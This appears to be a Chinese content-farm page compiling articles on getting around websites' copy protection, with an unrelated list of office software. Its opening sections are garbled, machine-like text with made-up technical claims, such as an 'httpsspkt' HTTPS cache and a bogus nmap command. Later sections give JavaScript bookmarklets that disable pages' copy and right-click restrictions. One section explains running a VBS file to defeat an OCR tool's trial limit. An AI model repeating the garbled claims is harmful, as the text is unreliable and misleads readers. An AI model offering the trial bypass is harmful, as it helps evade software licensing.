解读:破解网站禁止复制页面内容和图片链接有两种方法！
　　破解网站禁止复制页面内容和图片链接有两种方法，第一种是通过篡改协议的方式，第二种就是我们常用的https协议。第一种就是我们常用的抓包工具，下面，我们用抓包工具来看看如何实现破解网站禁止复制页面内容和图片链接。这样子是不是就不怕别人复制篡改到自己网站的图片页面了。首先，我们打开站长工具，然后选择爬虫功能，点击左侧的web采集，会看到有抓包的地址地址，例如：：get/url列表，看看返回到了哪些值。
　　
　　因为抓包地址在编码上是8位的url。抓包工具也会返回一些有用的东西，包括：xml是json之类的。我们看看这个url就是www.jason.py生成的。我们可以利用它来隐藏我们图片的内容，例如我们可以做个favicon的图标隐藏，这样别人在上传图片到网站就不能通过查找该网页内容而轻易复制到网站上。我们可以用代码来实现，代码中包含关键词//jad即代表js代码，含带"//"为有空格的网址，如//jad2.py这样。
　　这样做的好处是：1，不会影响到javascript的运行2，通过它更容易查看源代码，那这样就是上传到网站的图片更容易被复制了。那我们就来一起看看代码如何实现的。先来看看常见的源代码：最后代码如下，调用jad的方法，给它发送请求就行了。我是风凌，请大家关注我的个人博客/，实时更新it项目实战经验，欢迎大家关注交流。
　　
　　第二种方法，最重要的是实现请求网站的源代码。源代码在哪？其实就是我们的网站对应的页面头。我们来看看www.jason.py网站到底在哪个页面头。用一个url请求网站，你会发现我们通过两次请求，到达同一个页面。第一次请求过去，你会发现它回调另外一个页面，然后才启动网站第二次请求过去，只回调这个页面的http响应头，网站不启动。
　　这样就不会有cookie了。完成网站的网页重定向代码就是如下，修改www.jason.py的jad.header，把xml代码里的“//”改成"//jad"即可：修改源代码我们在www.jason.py站长工具页面，会看到有些代码“//jad”已经不再被使用了，因为他已经是通过请求网站的源代码然后显示在页面了。
　　修改这些代码即可。这些页面代码没法进行修改，只能从外部请求图片了。例如让某网站发图片请求你会发现图片不会直接跳转到网站上。你需要转到页面上，并调用图片下载。说了这么多，其实还是很简单，只要会抓包就可以了。有时候工具固然重要，知道方法，但是只会工具是没有用的，还需要结合代码，还是要多动手。原文链接：如何正确的破解网站禁止复制页面内容。 查看全部

　　破解网站禁止复制页面内容和图片方法非常简单，很简单
　　破解网站禁止复制页面内容和图片方法非常简单，
　　1、下载wget-8.0.10.tar.gz
　　2、解压并进入到解压后目录
　　
　　3、tar-zxvfdoc_info.tar.gz
　　4、修改目录里头device.txt文件，
　　5、切换到device.txt文件所在目录，运行target命令，选择“查看device.txt文件的路径”或者“查看当前目录下的device.txt文件路径”都可以，
　　6、最后点击“生成文件”再点击“复制”按钮
　　
　　7、点击“+”图标并在后面跟上你想要复制的内容就可以了。以上的内容不会对网站本身产生任何影响，最重要的是把网站的页面内容封禁了，即不能再cookie里获取内容。域名修改掉即可。
　　超级卡，甚至打开一个页面要几十秒，然后开始崩溃，最后重启网站才能用。去review讨论就可以了。
　　解决方法是：1.用dom.refresh()来刷新浏览器缓存图片，而不是直接用cookie2.不要用refresh()方法，
　　这个其实是浏览器缓存的原因。可以用下面的方法验证：检查下html标签是否设置了引用以及cookie等，如果没有设置的话就要验证cookie是否被修改了。 查看全部

　　破解网站禁止复制页面内容和图片为静态页面。。
　　破解网站禁止复制页面内容和图片为静态页面。
　　可以试试用chrome浏览器，用cookie抓取，包括页面信息、动态内容等，最重要是页面里的图片、视频以及各类常见的网站域名帐号。其实现可以，但是cookie会被浏览器清理掉的，你用这个方法得打点补丁，
　　
　　域名劫持包括跳转之类的试试
　　cookie真正的原理是脚本缓存，现在很多浏览器（火狐、谷歌），都设置cookie保存所有浏览器缓存。当你访问某个网站时，浏览器在pc端同步数据库中已存在当前的脚本缓存，本地浏览器为用户（useragent）的浏览历史实际上是进行更新的。当useragent与脚本缓存重合时，useragent已经缓存数据，浏览器就不需要再次去数据库更新数据。当浏览器停止浏览，cookie和脚本缓存丢失。
　　
　　一般的爬虫模拟浏览器，在爬虫启动时让爬虫保存cookie，爬虫关闭后删除cookie。
　　其实很简单，查看下浏览器的设置就知道了！你要做的就是找到你想保存某个站点的浏览器设置，
　　最简单的，phantomjs+webquest，phantomjs怎么爬应该就怎么爬，用angularjs最新版本(可以看看我发的一篇hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh。 查看全部

　　破解网站禁止复制页面内容和图片在任何安全设备可查看
　　
　　破解网站禁止复制页面内容和图片在任何安全设备可查看的环境中访问raw图片代替flash或gif图片foo标签等展示不安全的数据破解网站禁止复制网页上需要上传的内容进站点内容判断可以破解的账号+密码去掉网页上的广告提供网址过滤及过滤链接对于以上操作要有可靠的权威机构及用户认证方才可以开始实施———-分割线——安全环境检测一般指网站安全检测和服务器安全检测，这2个不是互斥的。
　　
　　但是要保证你攻击的网站正确有效，而不是中招了后才想起安全检测。因为所有的攻击对浏览器上页面的打开速度会有严重的影响，这跟你攻击的方式是截取上行网页还是拦截下来后再发送ajax请求一样，同样的攻击方式不同的检测要求网站打开速度降低得会非常夸张，因此适当降低网站所需要达到的要求，能够达到避免中招之后追悔莫及。
　　服务器的安全检测，网站存在很多的安全漏洞，有时只是写些字都不会被检测出来，只能靠自己找渗透点来找漏洞进行攻击。正常情况的服务器非常安全，如果你觉得服务器已经中毒被病毒给黑了，那就找服务器做个快照看看使用的操作系统和网络是不是存在漏洞，跟有无网站没有关系。其实，除去raw图片破解这种可能性，普通小网站完全没必要对网站上的大量图片做这种图片过滤检测，对其他没用的内容如链接、广告做过滤检测有一定的必要性。 查看全部

　　破解网站禁止复制页面内容和图片到外链的解决方案
　　破解网站禁止复制页面内容和图片到外链，是防止外链造假的手段，某些专门做破解的人在访问网站时通过上传当前网站的源代码来达到复制页面内容和图片的目的，当对外链的访问产生异常时，会向专门做这个业务的服务器发送程序，导致对外链的访问出现异常，直接导致服务器宕机，好在恢复速度快，有些异常情况在第二天或第三天就能够恢复，这是提升网站效果的最好方法。
　　
　　导致磁盘损坏也很麻烦啊,可以试试按照网站会员的步骤来试试...
　　
　　问题补充:在看到网站上“升华到1024级文本”时无法下载，一般可以先完成导入图片的操作。电脑中已经安装vs2015.10，weblogic9，omnicsearch7。无法解决。
　　1，直接从网站获取的图片是用户上传至虚拟机上的，引起虚拟机数据爆炸导致网站瘫痪；2，磁盘损坏出现这个问题，非常常见，损坏原因一般是复制大小为1gb的文件。从电脑的硬盘分区释放1gb的空间即可释放磁盘损坏几乎所有的情况，都是寻址错误引起的。针对磁盘损坏的解决方案，pc通过pe进行备份，再分区释放1tb或2tb的空间，移动硬盘通过u盘或转接盒释放空间，现在移动硬盘也不贵，然后移动硬盘直接通过ssd挂载到网站上的主机，基本上就不存在数据爆炸的情况了。 查看全部

　　10个顺手的高效率办公神器，妥妥安排
　　今天给大家介绍十个自己用的顺手的工具神器。有需要的老师可以公众号回复【神器10】获得软件，打包附送24个独家好看的字体。
　　软件搬运 | 吾爱破解论坛
　　FastStone Capture
　　录屏+滚动截图+GIF制作
　　Capture 是一个完全免费并且非常良心的电脑截屏软件；功能包含录屏，滚动截图，GIF制作等功能，非常适合培训的同学或者新媒体的同学进行使用，可以随时录屏教学或者制作GIF片段以及长图文等作用。
　　当然啦！最主要的功能就是录屏，支持 6 种录屏功能，包括：只录制音频、全屏录制、录制某一个窗口、录制某一个区域、游戏录制。
　　它还支持很多实用的细节功能，包括：支持多种视频格式的录制、支持 GIF 格式录制,支持屏幕取色器，支持截图功能、支持计时功能、支持混合从麦克风和扬声器输出录制的音频。
　　特点：免费，不用安装，体积小，操作简便
　　PDF补丁丁
　　PDF编辑
　　PDF补丁丁是一个完全免费并且非常小众但是功能强大的PDF文档编辑软件；功能包含批量修改PDF文件信息；批量重命名PDF文件；合并/拆分PDF文件；调整页面顺序；OCR文字识别等；
　　最最重要的就是PDF无损提取图片；以及一键转换成图片；一键替换全文字体；自动生成书签几个功能；具体的其他功能有需要的同学可以自行尝试。
　　特点：免费，不用安装，体积小，操作简便
　　PDF转换导航
　　PDF格式转换
　　很多同学可能都用过Small Pdf 这个网站；不过我最近发现这个网站可能运营不太好，所以转换的效率和限制越来越多。所以建议大家收藏一个PDF转换导航的工具。它支持的功能包括：PDF转DOC 、PDF 转PPT 、PDF转EXCEL、PDF转JPG 、PDF压缩、PDF合并、JPG转PDF 等实用功能。最多可支持上传20个文件。
　　网站同时支持MP3，电子书，压缩文件，表格等常用格式的相互转换。不过我没怎么用过他的其他功能，所以在此不多加评论。
　　PDF转换导航网站地址：
　　特点：功能丰富且实用，在线工作效率高
　　恰饭区1：
　　100font
　　免费字体网站
　　
　　蛮多同学在编辑图文或者做设计的时候都会碰到一个老大难的问题，那就是字体的版权和下载途径。
　　100font就是一个专门收集整理免费商用字体的实用网站，里面收集的字体都支持免费下载，而且可以免费商用，没有平台限制。网站目前有53款字体可以下载：
　　有需要的同学可以去网站了解字体的来源及展示，以及特点及适用风格。充分了解这个字体，再进行下载。
　　100font网站地址：
　　特点：免费可商用，字体下载便捷
　　求字体网
　　字体查询
　　既然聊到字体，那就不得不提一下这个工具了。相信很多设计的同学在遇到喜欢的海报字体设计时，但是苦于不知道字体的来源而懊悔不已。其实大可不必，这个工具可以有效的解决这个痛点问题！
　　设计的同学可以截图相关字体的图片进行上传识别，网站进行解析操作，从而有效获得字体的正确版本为你进行识别并且提供可商用的下载通道（不一定免费）
　　求字体网地址：
　　特点：专业性强，在线查询便捷
　　Quicker
　　效率工具
　　这是一款让你用起来特别「爽」的软件，能够极大地帮助你提升工作效率，免去一些常用操作中机械化的步骤，真正意义上解放双手。
　　详细的注册安装等步骤就不赘述了，我来给大家推荐一些Quicker常用的一些安装功能：第一个是截图 OCR文字识别；
　　在网上有时会看到一些值得保存的文本内容，但这些内容可能是以图片的形式存在，或者出于保护的原因，设置了禁止复制。例如非常讨人厌的PDF文件格式。OCR文字识别就是能够让你一步到位直接复制出文本的功能。
　　第二个功能是一键查找传送文件：很多时候，当你需要在微信或者钉钉上给别人传送文件，你需要在纷乱无章的文件夹当中慢慢进行寻找，其实这个过程就是效率降低的过程。因为Quicker就可以实现一步到位，方便快捷。
　　（图片来源芒种学院公众号）
　　特点：快速专业，但是上手难度较大。建议小白可以尝试一下
　　SpaceSniffer
　　超强电脑清理工具
　　大部分人的电脑都会安装「XX全家桶」软件，但是用的杀毒和管理工具越多，发现电脑会越来越卡。尤其是在桌面放满了零零散散的文件之后，你会悲剧的发现，电脑更卡了。所以今天给大家安利一款超值的电脑清理软件——SpaceSniffer；不用管叫啥，但是使用起来真的爽，无需安装，即点即用。打开之后进行扫描。无论隐藏多深的文件，都能一目了然。
　　（超强扫描过程，并且自动分类）
　　扫描完成后，软件会按照文件的大小，进行划分，可以直接右击删除或者双击查看都行，一些没用的东西辨别出来，就直接删除了。
　　
　　更强大的是，我们可以针对性地扫描，例如只扫“
　　特点：快速方便，适合电脑小白使用
　　FileViewPro
　　万能媒体播放器
　　面对工作中碰到的各式各样的文件，你肯定经常双击之后发现没有软件可以打开，然后再去百度上搜索下这是什么，然后下载对应的软件将这个文件打开，效率非常低，这个时候你需要一个可以打开任何格式文件的神器——FileViewPro，从名字就可以看出这是一个文件查看器，支持打开数百种文件格式，想看啥就看啥！
　　说一个很简单的理解方式，就是万能媒体播放器
　　恰饭区2：
　　Docsmall
　　文件压缩神器
　　Docsmall 是一个完全免费的在线办公网站，它聚合了5个实用功能，包括：图片压缩、 GIF 压缩、 PDF 压缩、 PDF 合并、 PDF 分割。
　　最重要的功能是PDF压缩和图片压缩。贴心的支持4个压缩强度，包括：轻度、普通、强力、极强，压缩后的文件体积依次减小，视觉效果依次变差。可以将几百M的文件压缩到几M。
　　非常适合新媒体编辑过程中需要压缩文件或者图片的用途
　　Docsmall网站地址：
　　特点：压缩王者，在线功能强大，免费
　　Bigjpg
　　图片无损放大
　　这是一款放大图片的软件，很多时候我们对照片质量不理想的时候，例如像素不够，分辨率不够等问题。可以用bigjpg来进行解决，这是一款在线AI人工智能图片放大工具。功能就是可以无损放大图片的像素和分辨率，比如几百K的图片可以放大到5m左右，并且实现原图的80%效果。适用于图片复原的应用场景，不过文件限制10m以内。
　　Bigjpg网站地址：
　　特点：图片无损放大，最高16倍
　　你还用过其他用的顺手的软件吗？欢迎在评论区推荐~
　　-END-
　　写在最后
　　——工具喵，一个奇思妙想的喵和他会的各种工具神器。
　　除了高效率的软件，我们还要合理地去使用它，才能让这些工具成为我们的利器，希望上面的这10个软件，能够帮你打造一个舒适的电脑办公环境。
　　本期推荐的所有软件及网站均为免费，所以可以放心版权使用的问题。
　　本公众号对话窗口回复【神器10】可以获得所有软件的下载链接。 查看全部

　　可能是最简单的破解网页文字禁止复制的方法！
　　我们写材料时会经常在网上「汲取」别人的灵感，但是有些网站的文章禁止我们复制，怎么办？
　　
　　今天教大家一个最简单的解除网站禁止复制的方法。
　　在我经常用的 Chrome 浏览器为例，选中文字之后拖到浏览器的网址页，就可以复制了，再粘贴到文本框。
　　怎么样，简直就是 0 成本，不需要任何插件就能做到，所以特别推荐给大家。
　　
　　只是，我这个是在 Chrome 浏览器上测试，其它浏览器是否可行，大家可以自己试试。
　　还有这个方法对百度文库不起作用，想要百度文库的破解方法，可以看看之前的百度文库复制技巧合集。
　　之所以安利这个方法，是因为足够简单，遇到此类禁止复制的网页，不妨先试试这个方法。 查看全部

　　实用技巧，一招破解各大网页限制！
　　引例
　　昨天公众号给大家分享了酷我音乐PC端的最新版——纯净高级版，新版软件剔除了【直播】【美女秀】和【游戏】等各种广告，成为一个更加纯粹的音乐软件，除此之外，之前的无需登录以及解除付费下载限制等还在，是一款值得推荐的听歌软件。还没有看昨天推文的同学，点击下方文字链接直接跳转。
　　陌尘众享公众号粉丝意愿调查
　　网上资源千千万，真正适合我们的却不多，为了更好的迎合粉丝们的需求，现需要调查粉丝们对公众号的意见和意愿，这样有助于我们分享的资源更契合您的需求，因此如果大家有时间的话，务必请大家帮忙填一下调查问卷。
　　现在公众号的推送机制，不再是按照时间的先后顺序进行推送文章了啦，采用的是全部打乱顺序机制进行推送，所以有的朋友可能看不到文章。
　　希望大家可以动动小手将陌尘的公众号添加到“星标⭐”，这样就不会错过陌尘分享的每一款软件神器、精彩教程、福利资源了，非常感谢~
　　最近收益惨不忍睹，觉得不错记得打个卡
　　打卡时间到
　　更新推送不易，大家觉得不错的话，打打卡支持一下？
　　通过目前的问卷统计显示，对实用技巧类的资源最感兴趣。刚好发现一个技巧，解决平常会遇到的问题，感觉挺实用的。上面的问卷调查还是希望大家能填下，让陌尘更好的了解大家对什么类型东西感兴趣，以便分享的资源更加契合大家的需求。
　　
　　破解网页禁止复制
　　大家平时上网一定遇到过网站禁止复制文字的情况，对于这种做法，也表示理解，毕竟千辛万苦原创文字被他人随意复制剽窃，自然会采取一些手段防止。
　　我们经常用到的百度文库、道客巴巴等，均采用了一定的技术防止文字直接被复制，必须注册账号才能复制内容，更甚者复制还需要付费，码字又实属浪费时间。下面就教大家如何破解网页禁止复制文字。
　　1一串代码轻松搞定页面复制
　　目前解决网页复制问题方法较多，其中有不少油猴脚本、浏览器插件，不过解决这种小问题杀鸡焉用牛刀，只需要一行代码就可以轻松解决。
　　只需将下面这串代码保存成书签或者鼠标选中后拖放在浏览器书签栏，在禁止复制的页面上点击这个书签刷新页面就可以复制了。
　　查看代码
　　javascript:!function e(t){function n(){}function o(e){e[i]。removeChild(e)}function r(e){return[]。slice。call(t。querySelectorAll(e))}function c(t){function n(){s(function(){if(!o)try{var n=t。contentDocument;n。body。childNodes。length&&(o=1,e(n))}catch(e){o=0}},100)}a[l](function(e){t['on'+e]=null});var o;n(),t。onload=n}for(var i='parentNode',l='forEach',a='contextmenu dragstart selectstart select copy beforecopy mouseup mousedown'。split(' '),u=setTimeout(n,0);u>=0;u--)clearTimeout(u);for(u=setInterval(n,1e8);u>=0;u--)clearInterval(u);var s=setTimeout;setTimeout=setInterval=n,r('script')[l](o);var m=[];r('iframe,frame')[l](function(e){m。
　　push(e),e[i]。replaceChild(t。createElement('script'),e)});var f=t。documentElement。innerHTML;t。open(),t。write(''),t。close(),t。documentElement。innerHTML=f,r('script')[l](function(e){e[i]。replaceChild(m。shift(),e)}),r('*')[l](c),c(t),a[l](function(e){t。addEventListener(e,function(e){e。stopPropagation()},!0)});var p=t。createElement('style');p。innerHTML='*{-webkit-user-select:text!important;-mo-user-select:text!important;user-select:text!important;}',t。body。appendChild(p)}(document);
　　这串代码基本能破解98%的限制，包括文字、图片复制以及屏蔽页面右键菜单，将其保存到书签里使用起来相当的方便。
　　2浏览器开发者工具
　　众所周知，浏览器按下快捷键F12会调用出开发者工具，其主要帮助前端开发者用于网页布局、调试脚本、网页抓包等，其中最主要的用法就是查看和编辑网页布局（HTML+DIV）
　　通过它可以方便的查看网页上的任何元素，包括文字、图片等，对于被禁止复制的网页我们直接右键查看元素，定位到要复制的文字内容直接复制即可。
　　一般情况下，使用上面那串代码基本都可以解决复制问题，有些网站太变态可能不奏效，如果页面右键、快捷键F12同时被禁止，这种情况我们只需打开任意一个网站，按下快捷键F12调出开发者工具，然后同一窗口刷新打开你想复制的网站即可，通过这种方法，没有无法复制的内容。 查看全部

　　仅需一招轻松解除网页复制限制!
　　本公众号资源来自于网络，仅限用于个人学习交流使用，不得用于商业用途，当你使用本号内容时即默认你认可一切条款！如有侵权，请联系夏天删除~
　　
　　每日一听： 这里是点歌台，大家有想听的音乐就在评论区留言吧！
　　Hi，大家好，我是夏天。这几天分享的都是娱乐类的软件，那么该学习了。为了给各位营造良好的学习氛围，说点小技巧来助力各位工作和学习、
　　今天给大家分享的是1款网页插件 -- 简悦SimpRead，还有油猴插件的使用。
　　软件名称：
　　简悦SimpRead
　　软件用途：
　　免费复制网页文字工具
　　适用平台：
　　电脑端网页平台
　　
　　前言
　　在日常的工作学习生活中。我们经常会上网查找一些资料，比如百度文库，豆瓣网页，还有知乎等等，当出现了当你好不容易找到需要的资料时，确发现不能复制或者限制性复制，此时是不是很抓狂啊，别担心，我特别的为各位介绍2个小技巧，轻松解决这一限制问题。
　　
　　这难道不是一个意思吗?
　　
　　
　　
　　软件介绍
　　大家可能听说过Safari浏览器提供的阅读模式，可以去掉页面中多余的内容，只保留最重要的文章主体供读者阅读，而且会在字体和排版上做出优化，使页面更加赏心悦目，这是官网页面图。
　　
　　Chrome虽然没有默认提供这一功能，但借助强大的插件，阅读模式根本不是问题~ 今天就为大家介绍一款很好用的网页阅读模式插件——简悦。支持200+网站适配和丰富的自定义功能！
　　简悦，是一款非常强大的 Chrome 扩展插件。简悦的宗旨：还原阅读本质，提升阅读体验。在【知识爆炸/信息过载】的当下，如果你有与我一样的【阅读障碍】 ，相信【简悦】会对你所有帮助。
　　阅读模式:独有功能，通过提取标题 · 描述 ·正文 · 媒体 图片 / 视频等资源
　　生成符合中文阅读习惯的页面，具有零干扰 · 沉浸式特点，适合深入阅读。
　　
　　聚焦模式:不改变当前页面的结构，仅仅高亮需要阅读的部分，适合临时阅读或者未适配阅读模式的网站；
　　
　　定制化，可编程:有不想显示的图片？没问题！页面任意元素，均可重新编辑。支持：HTML 节点· XPath · jQuery 语句·正则表达式甚至编写JavaScript 代码。
　　词法分析引擎：全新的词法分析引擎，不仅能识别出 Wordpress · Hexo · Ghost · Discuz 只要是结构良好的页面均可自动生成阅读模式。不仅如此，并具有多种识别模式：
　　1. 论坛类页面 & 分页
　　识别知乎 · 百度贴吧等论坛类页面并具有分页栏，详细请看论坛类页面及分页。
　　2. Markdown | TXT 阅读器
　　自动识别 .md .txt 后缀格式，甚至包括本地文件，详细请看Markdown 阅读器。
　　3. 代码高亮
　　自动将包含有代码端的内容高亮处理，详细请看代码段的高亮。
　　4.LaTeX 识别
　　智能识别含有 LaTeX 代码的页面，详细请看LaTeX 识别。
　　
　　5. 支持生产力工具 - 以及多种导出方式
　　Pocket · Instapaper · Github· Notion · 印象笔记 / Evernote · Onenote · Dropbox · Google 云端硬盘·Bear · Ulysses语雀
　　坚果云 · 有道云笔记 · 为知笔记，甚至 WebDAV。
　　
　　插件测试
　　介绍完了。说这么多也没给广告费
　　
　　
　　
　　，安装之后其实什么也不用做，只要访问网站时，如果此页面已经被插件适配，它在右上角插件托盘的图标就会显示为
　　
　　，点击图标，就可以进入阅读模式了。这是豆瓣网站看的一篇文章，没进入阅读模式是这样的。
　　
　　如何开启阅读模式：打开网站，点击鼠标右键，看到简悦图标亮起，选择阅读模式即可！
　　
　　下面就是普通的豆瓣页面，变成阅读模式之后的效果：
　　
　　阅读模式下的字体、字号、背景色都可以随意设置，GIF动图展示一下功能。
　　
　　右下方红色的小按钮，点击可以修改的设置有很多，字号主题切换、字体字号设置、分享到社交网络等等。这张思维导图很全面的介绍了它能实现的功能
　　
　　
　　
　　
　　我们看看官网适配的网站，市面上比较常见的网站它都有，36氪，知乎，微信，虎嗅，哔哩哔哩，还有豆瓣等等。
　　讲完了简悦插件，其实这不重要，接下来才是重点中的重点！
　　如何解除网页禁止复制和右键限制复制，随心所欲的复制全网内容？
　　1. 打开浏览器，保存任意网页为书签，比如打开百度，保存为书签。
　　2. 然后将网址框中的内容删除，并粘贴为下面的代码：
　　javascript:(function(bookmarklets)%7Bfor(var i=0;i0)%7Bwindow.open(code)%7D%7D%7D%7D)(%5B%7Btitle:"破除右键菜单限制",url:"javascript:function applyWin(a)%7Bif(typeof a.__nnANTImm__===%5Cx22undefined%5Cx22)%7Ba.__nnANTImm__=%7B%7D;a.__nnANTImm__.evts=%5B%5Cx22mousedown%5Cx22,%5Cx22mousemove%5Cx22,%5Cx22copy%5Cx22,%5Cx22contextmenu%5Cx22%5D;a.__nnANTImm__.initANTI=function()%7Ba.__nnantiflag__=true;a.__nnANTImm__.evts.forEach(function(c,b,d)%7Ba.addEventListener(c,this.fnANTI,true)%7D,a.__nnANTImm__)%7D;a.__nnANTImm__.clearANTI=function()%7Bdelete a.__nnantiflag__;a.__nnANTImm__.evts.forEach(function(c,b,d)%7Ba.removeEventListener(c,this.fnANTI,true)%7D,a.__nnANTImm__);delete a.__nnANTImm__%7D;a.__nnANTImm__.fnANTI=function(b)%7Bb.stopPropagation();return true%7D;a.addEventListener(%5Cx22unload%5Cx22,function(b)%7Ba.removeEventListener(%5Cx22unload%5Cx22,arguments.callee,false);if(a.__nnantiflag__===true)%7Ba.__nnANTImm__.clearANTI()%7D%7D,false)%7Da.__nnantiflag__===true?a.__nnANTImm__.clearANTI():a.__nnANTImm__.initANTI()%7DapplyWin(top);var fs=top.document.querySelectorAll(%5Cx22frame, iframe%5Cx22);for(var i=0,len=fs.length;i=0;i--)%7Bvar elmOne=arAllElements;with(elmOne.wrappedJSObject%7C%7CelmOne)%7Bonmouseup=null;onmousedown=null;%7D%7Dvar head=document.getElementsByTagName(%5Cx27head%5Cx27)%5B0%5D;if(head)%7Bvar style=document.createElement(%5Cx27style%5Cx27);style.type=%5Cx27text/css%5Cx27;style.innerHTML=%5Cx22html,*%7B-moz-user-select:auto!important;%7D%5Cx22;head.appendChild(style);%7Dvoid(0);%7D)();"%7D%5D)<br />
　　
　　3.最后保存书签，就完成了！以后遇到无法复制的文本内容，或者打不开右键菜单的网页，只要点一下这个书签，然后复制限制立马解除了
　　
　　
　　
　　插件放在文章的后台了，回复数字即可下载。这2个小工具在工作和学习中搭配起来使用，会让你的工作更为顺畅便利哦！我相信用不了多久你就会升职加薪当上总经理，出任CEO，迎娶白富美，走向人生巅峰！！！
　　好了，今天的分享就到这里了，看完文章如果觉得对你有所帮助，就动动手指点个在看吧，让我知道你一直都在。
　　
　　插件获取方式
　　请在公众号后台回复 简悦或085即可获取下载地址。
　　如果你觉得小编分享的资源感兴趣，你可以分享给更多的朋友，或者点一下底部的“点赞”和“在看”，让小编更有动力为大伙找更多的福利！
　　| 今日热聊话题 |
　　你还知道哪些实用的软件？
　　欢迎留言！ 查看全部

　　破解网站禁止复制页面内容和图片解密复制不出网站上页面
　　破解网站禁止复制页面内容和图片解密复制不出网站上页面，无法访问网站的图片，无法复制页面数据内容。破解的方法就是找到服务器的cookie上的这个文件。找到后，就是对着这个文件编辑，上传你要的图片上去。
　　通过nmap命令接收数据包来确定哪些信息来源于公网
　　当你访问https资源时，在ssl协议当中存在httpsspkt;这个是https的缓存机制，会在请求资源（即web页面）时，缓存在httpsspkt这个区域中。如果需要把这个区域中的httpsspkt数据请求返回到本地服务器，需要使用请求中url的接口，也就是https协议请求路径中url中的httpsspkt这个接口。
　　一般在服务器端执行：nmap-svf|grephttpsspkt以返回的结果返回：success这个结果就是你需要的内容。
　　我目前也想知道这个问题。你可以去一些https网站下载证书或者别的方式。
　　nmap
　　https的话是nslookup-lookup;别的网站有fetch证书。
　　redhat自带一个nslookup命令，
　　getssl/getssladder，亲测有效。
　　thereturns(rsp)authenticatedhttpsauthentications.
　　nslookup-lookup？
　　下个破解版的软件nslookup-lookup看图说话
　　https是什么？你倒是说明白。
　　我的理解不太通。不过，重启网站后需要重新配置一下证书。至于需要证书才能破解的网站肯定不是这么简单了。 查看全部

　　一招儿让你随意复制网页甚至图片上的文字，就是这么任性！
　　
　　我们平时在浏览网页时，可能会遇到一些自己需要文字，但有些网页做了处理，禁止复制，这让人很头疼，如果一个字一个字的敲，不仅累人而且效率非常低。大家可能都了解过一些强制复制网页文字的方法，可对于一些防范性做的好的网站，例如小说网站、文档资源网站来说，你的招数可能就要失灵了。今天，“电脑那些事儿”给大家介绍一款软件，让你轻松复制网页上甚至是图片上的文字，就是这么任性。
　　1、首先下载网页文字识别软件
　　
　　该软件为绿色版，下载后直接解压，无需安装。
　　
　　2、运行CoCo图像转换成word文字识别工具.VBS
　　
　　注意：不要点击上面的.exe文件，否则将无法完成破解，只能使用5次。
　　3、运行后会出现以下界面，别担心，显示可以试用五次，但其实是无限次数的。
　　
　　4、点击“选择区域”按钮，将想要复制的部分框选起来。在出现的“屏幕识别”框中选择识别的内容分类，如“文本”、“表格”、“图像”等，背景也需要根据实际情况进行选择，如“浅色”、“深色”或“自动”，语种类别也提供了很多中国，如“简体”、“英文”、“手体”等。
　　
　　5、选择好后，点击“确定”，会出现“TH-OCR正在识别，请稍后”的字样，开始识别文字。
　　
　　6、识别完成后，自动生成“Result.txt”文本，就可以随意复制啦，准确率还是非常高的！
　　
　　而大家知道，在我们不使用这软件的时候，如果想复制这网页内容，会出现以下提示：
　　
　　注意：不仅可以识别禁止复制的文本，对于图片上的文字也是可以识别并生成可复制文档的哦~
　　 查看全部

　　网页上文档禁止复制怎么办？试试这5招，简单好用
　　点击上面↑“妙语办公助手”可以订阅哦！在工作中，我们经常会在网上查找资料，但是很多时候花了很大功夫找到了资料，却发现不能直接复制，使用就必须先付费，尤其是一些文库中的文档，那有没有什么好的方法能免费获得其中的内容，今天就让我来给您推荐几个破解方法，帮您在网上免费免费薅羊毛。
　　
　　1、百度快照复制网页链接，粘贴到百度搜索中，点击【百度一下】，再点击下方【百度快照】，这样就会进入这个页面的百度快照中，一般在百度快照中就可以直接复制了，前提条件是这个网页要被百度先收录。备注：此方法最简单，对大部分页面都适用，但是百度文库的内容，无法通过此方法复制。
　　
　　2、沉浸式阅读器进入网页后，先选中要复制的文字，然后鼠标右击，选择在【在沉浸式阅读器中打开所选内容】，进入阅读器后，就能直接复制所选文字了。备注：沉浸式阅读器能直接在网页中打开，不用专门下载，此方法的缺点是适用性不高，很多网页都无法使用。
　　
　　3、图片转文字先通过截图或手机拍照，将网页上的文字转为图片，然后使用图片转文字工具，直接提取其中的文字，建议使用妙语办公，这是一个网页版工具，图片转文字完全免费，上传图片就能直接转出成文字。
　　
　　4、网页源代码
　　进入网页后，鼠标右击，选择【查看网页源代码】（也可以用Ctrl+U），然后在源代码中找到要复制的文字部分。缺点是有些网页的源代码中不含文字内容，此外还有些网页源代码中文字和代码交互在一起，筛选起来比较麻烦。
　　
　　5、QQ截图复制先在电脑上登录自己的QQ，然后进入要复制的网页，按住Ctrl+Alt+A开始截图，调整截图大小，点击【文】，就可以看到识别出来的文字，缺点是识别出来的文字要按照段落和板块分别复制，无法一次性复制出来，操作起来比较麻烦。备注：如果要复制的内容比较多，可以先调小电脑分辨率（Ctrl+Alt+鼠标滚轮），让电脑屏幕显示更多内容。
　　 查看全部

　　网页上的文字禁止复制？不存在的，3秒破解
　　世界那么大，谢谢你来看我！！关注我你就是个网络、电脑、手机小达人
　　我们遇到自己不懂的东西时都会在网上查找资料和答案，可经常会遇到网页上的文字不能复制粘贴的情况，特别是百度文库和360个人图书馆中的内容，就会出行下面这样的情况：
　　
　　其实这是利用了JavaScript限制复制的代码，'一物降一物'自然就解决的办法，今年电脑老师傅教你3招，轻松解除限制！
　　1、JavaScript代码
　　首先找到你需要复制内容的网页，在浏览器地址栏输入
　　javascript:void($={});
　　这串代码，然后按下回车键就可以轻松复制网页上的内容了哦！
